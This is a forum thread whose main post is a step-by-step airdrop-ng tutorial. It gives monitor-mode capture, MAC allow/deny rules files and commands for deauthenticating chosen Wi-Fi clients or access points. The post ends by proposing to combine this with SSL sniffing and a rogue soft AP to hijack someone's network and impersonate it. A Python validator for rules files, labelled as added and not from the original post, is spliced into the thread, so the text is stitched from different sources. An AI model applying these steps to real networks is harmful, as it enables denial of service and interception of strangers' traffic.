Airdrop: Rule Based Deauth
  • Sh3llc0d3
    Posts: 1,910
    Airdrop-ng tutorial - Rule Based Deauth
    This tutorial is based on BackTrack 4 and I'll assume you are competent with Linux to the standard this tutorial requires. You must also have a wireless interface that supports packet injection and monitor mode.

    Capturing Your Surroundings
    First we need to capture the wireless activity in the area.

    airmon-ng [to check the interface you will be using]
    airmon-ng start wlan0 [starts the interface 'wlan0', change it accordingly]
    airodump-ng mon0 -w capture --output-format csv ['mon0' is your interface in monitor mode, and csv is the output filetype of the captured information with a filename in this example of 'capture']

    This step you can do previous to capturing the file if you have a specific target you know the MAC address of, but normally is done afterwards so you can review the output in the terminal of airodump-ng [last command above].

    MAC Rules Info
    We need to understand a basic formula for how the 'rules' work within airdrop-ng: a = allow whereas d = deny. I know, rocket science isn't it lol. This is where it gets to the good bit. The format of each rule, whether it's allow or deny access, is allow (a) or deny (d), then the bssid's MAC, followed by the client's MAC. Below are examples of how it would look.


    Allow rule: a/bssid MAC ['any']|victim's MAC ['any']

    Deny rule: d/bssid MAC ['any']|victim's MAC ['any']

    However, you may wonder what the 'any' is for. Well if you decide you don't want anyone to connect to a bssid then you would put this for example:

    d/00:11:22:33:44:55|any [00:11:22:33:44:55 being the bssid you wish to alienate]

    To do the opposite and allow a MAC to not connect to anything:

    d/any|00:11:22:33:44:55 [00:11:22:33:44:55 being in this example the client you wish to block]

    Implementing MAC Rules
    To put the rules in place we need to setup a 'rules' file which airdrop will read and implement the rules from. To add rules to the file we do so thus:

    echo '#D' > rules && echo 'd/any|xy:xy:xy:xy:xy:xy' >> rules [this command will create the file 'rules' on your desktop and enter the above rule under the heading '#D']

    The contents will look like this [remember I'm using D to remind you this is Deny!!]
    #D
    d/any|xy:xy:xy:xy:xy:xy


    Running Airdrop-ng
    Installing Airdrop through synaptic is what I'll advise you to do, as it places everything in the right place for you to follow this tutorial. Navigate using terminal to the airdrop directory:
    cd /pentest/wireless/airdrop-ng/

    Once there we start airdrop-ng:
    airdrop-ng -i mon0 -t /capture.csv -r /rules [-i = interface, -t = capture file and -r = rules file. You can also run a rule debugging mode which is activated by using -b after rules e.g. airdrop-ng -i mon0 -t /capture.csv -r /rules -b]

    We next have to understand a very important concept in the rules file reading process done by airdrop-ng. The program reads from top to bottom, so allow rules applying to a specific MAC must come before deny rules applying to the same MAC. Using another example I'll demonstrate.

    #D
    d/xy:xy:xy:xy:xy:xy|any
    [we've now blocked all access to an AP/bssid, but then we decide we want a specific MAC only to connect to it. This must be done as shown below].

    #A
    a/xy:xy:xy:xy:xy:xy|yz:yz:yz:yz:yz:yz
    #D
    d/xy:xy:xy:xy:xy:xy|any


    As you can see above, our original rule of denying every connection to the AP is below the rule to grant/allow access to the one MAC/client. This must be done in this format!! To make alterations to the rules file use the following command:

    nano rules [you can use other text editors but I prefer nano, it's down to personal preference]

    Note: a lot of cases have been reported on a few forums of airdrop not responding to more than the 1st allow rule. So have one allow and the rest denials.

    OUI [Organizationally Unique Identifier] Hardware names
    Airdrop also had the function to allow or deny based on the OUI and hardware names [but not to the same extent]. It is implemented in the same way as the MACs. I won't be giving out a tutorial on this part because it's had hit and miss results and I've not personally tried it, only the MAC deauth.
    However, the OUI list is located below:
    nano /pentest/wireless/airdrop-ng/support/oui.txt

    To update the OUI list use:
    airdrop-ng -u

    How does this tutorial help you?
    If you combine my other tutorial on SSL sniffing and SoftAP's with this, you could hijack someone's AP, route traffic through your softAP using their connection, ban all access to the original AP and palm your AP off as the original using the airdrop-ng rule system.
    My other tutorial
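
Added example (not part of the original post and not airdrop-ng's own code): a dry-run check of the rules-file format and the top-to-bottom ordering described in the post above, for confirming before an authorised test that a rules file only covers in-scope devices. It assumes first-match-wins evaluation as the post describes; the function names and the MAC addresses are constructed for illustration.

```python
import re

# Constructed sample MACs (locally administered range), not from the post.
AP, OK_CLIENT, OTHER = "02:00:00:00:00:aa", "02:00:00:00:00:01", "02:00:00:00:00:02"
GOOD = f"#A\na/{AP}|{OK_CLIENT}\n#D\nd/{AP}|any\n"   # allow above deny, as the post requires
BAD = f"#D\nd/{AP}|any\n#A\na/{AP}|{OK_CLIENT}\n"    # deny first: the allow never applies

MAC = re.compile(r"(?:[0-9a-f]{2}:){5}[0-9a-f]{2}")

def parse_rules(text):
    """Parse 'a/<bssid>|<client>' and 'd/<bssid>|<client>' lines; '#' lines are headings."""
    rules = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.fullmatch(r"([ad])/([^|]+)\|(.+)", line, re.I)
        if not m:
            raise ValueError(f"line {n}: expected a/<bssid>|<client> or d/<bssid>|<client>")
        action, bssid, client = (p.strip().lower() for p in m.groups())
        for field in (bssid, client):
            if field != "any" and not MAC.fullmatch(field):
                raise ValueError(f"line {n}: bad MAC {field!r}")
        rules.append((action, bssid, client))
    return rules

def covers(rule, bssid, client):
    """True when the rule's bssid and client fields both match (or are 'any')."""
    return rule[1] in ("any", bssid) and rule[2] in ("any", client)

def decide(rules, bssid, client):
    """Assumption: first matching rule wins, top to bottom; no match leaves the pair alone."""
    bssid, client = bssid.lower(), client.lower()
    for rule in rules:
        if covers(rule, bssid, client):
            return "allow" if rule[0] == "a" else "deny"
    return "untouched"

def shadowed_allows(rules):
    """Allow rules that can never apply because an earlier deny already covers them."""
    return [r for i, r in enumerate(rules) if r[0] == "a"
            and any(d[0] == "d" and covers(d, r[1], r[2]) for d in rules[:i])]

if __name__ == "__main__":
    for name, text in (("GOOD", GOOD), ("BAD", BAD)):
        rules = parse_rules(text)
        print(name, decide(rules, AP, OK_CLIENT), shadowed_allows(rules))
```

A non-empty result from `shadowed_allows` means an exempted client sits below a deny that already covers it, which is the ordering mistake the post describes.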
  • Xin
    Posts: 3,251
    Another great tutorial, you're pretty good at all this network stuff!
    Xin
  • Sh3llc0d3
    Posts: 1,910
    Xin said:
    "Another great tutorial, you're pretty good at all this network stuff!"

    Yeah, it's the hacking area I get most practice at. My parents know nothing about computers, let alone networking, so I've had to set our home one up. Wireless router downstairs [with ethernet to parents' computer], upstairs in my room I set up a wireless AP with its own subnet, did have a hardware firewall but took it down for one reason or another, that tower's now used for wireless hack testing and got my desktop, did have two laptops [now just one] and the Wii on wireless. My room must drain so much electricity, it's mad. They still don't know I reset the passwd on the router and that was years ago. Networking's fun but I definitely want to expand my knowledge :D
  • Xin
    Posts: 3,251
    Yeah, I've focused mainly on web app security :), more than other areas, but I can cover all bases
    Xin